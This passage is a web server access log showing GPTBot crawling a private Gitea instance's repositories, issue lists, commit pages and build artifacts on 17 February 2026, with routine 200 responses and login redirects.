git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9950] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=all&type=all" +[17/Feb/2026:17:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:17:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:17:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 11129] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:17:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fobj%2fTestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 23507] [Gzip 4.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" +[17/Feb/2026:17:37:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=all&type=all" +[17/Feb/2026:17:37:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" +[17/Feb/2026:17:37:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json" +[17/Feb/2026:17:37:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11899] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json" +[17/Feb/2026:17:37:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11315] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json" +[17/Feb/2026:17:37:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json?display=source" [Client 74.7.227.38] [Length 11090] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json" +[17/Feb/2026:17:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json?display=source" [Client 74.7.227.38] [Length 11717] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json" +[17/Feb/2026:17:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10102] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:17:37:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&state=closed&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&state=all&type=all" +[17/Feb/2026:17:37:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:17:37:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:17:37:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:17:37:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:17:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 8598258] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:17:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10086] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:17:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 1521] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:17:37:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" +[17/Feb/2026:17:37:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&state=open&type=all" [Client 74.7.227.38] [Length 10132] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" +[17/Feb/2026:17:37:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&state=open&type=all" [Client 74.7.227.38] [Length 9964] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" +[17/Feb/2026:17:37:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 14260] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" +[17/Feb/2026:17:37:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 929] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" +[17/Feb/2026:17:37:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11768] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-next-todo.md" +[17/Feb/2026:17:37:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11768] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-next-todo.md" +[17/Feb/2026:17:37:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9960] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:17:37:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?files=git%20%ec%84%9c%eb%b2%84%20%ec%82%ac%ec%9a%a9%eb%b2%95%20%eb%8c%80%ed%99%94%20%eb%b3%b4%ea%b4%80%2fWireguard%20%ec%84%a4%ec%a0%95%20%eb%b0%a9%eb%b2%95.txt" [Client 74.7.227.38] [Length 21122] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:17:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:17:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11132] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:17:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 13942] [Gzip 3.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:17:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 13941] [Gzip 3.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:17:37:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 13911] [Gzip 3.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:17:37:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12033] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:37:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12031] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:37:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12004] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:37:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12033] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:37:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9969] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:17:37:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12033] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:37:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:17:37:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:37:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 9925] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:17:37:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 9924] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:17:37:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 9890] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:17:37:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 13662] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:17:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 13694] [Gzip 6.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:17:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 13693] [Gzip 6.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:17:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 6985] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:17:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 6985] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:17:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 6985] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:17:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 